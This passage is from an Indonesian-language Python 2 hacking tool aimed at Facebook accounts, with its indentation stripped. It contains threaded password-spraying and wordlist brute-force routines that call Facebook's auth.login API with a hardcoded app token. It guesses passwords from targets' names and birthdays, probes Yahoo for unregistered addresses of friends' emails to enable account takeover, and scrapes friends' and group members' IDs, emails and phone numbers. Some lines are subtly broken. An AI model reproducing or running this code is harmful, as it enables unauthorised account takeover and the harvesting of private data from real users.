raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['sayang'] + 'sayang'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['doraemon'] + 'doraemon'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
